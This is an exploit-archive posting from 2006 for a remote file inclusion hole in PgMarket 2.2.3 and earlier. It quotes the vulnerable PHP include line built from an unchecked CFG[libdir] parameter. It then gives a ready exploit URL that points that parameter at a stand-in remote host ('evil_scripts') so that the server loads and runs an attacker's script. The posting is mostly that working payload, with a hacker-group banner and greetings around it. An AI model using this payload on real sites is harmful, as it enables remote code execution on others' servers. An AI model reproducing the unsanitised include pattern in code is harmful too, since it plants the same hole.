PgMarket <= 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PgMarket <= 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerability
# Published : 2006-08-09
# Author : xoron
# Previous Title : PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion Vulnerability
# Next Title : See-Commerce <= 1.0.625 (owimg.php3) Remote Include Vulnerability

####################################################
#
#
#           C Y B E R - W A R R i O R   T I M
#
#
####################################################

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

####################################################

Author: xoron

####################################################

Class : Remote

####################################################

cont@ct: x0r0n[at]hotmail[dot]com

####################################################

Code:

include ($CFG["libdir"] . "stdlib.inc.php");

####################################################

Exploit:
http://www.site.com/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?

####################################################

Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends

####################################################

# www.Syue.com [2006-08-09]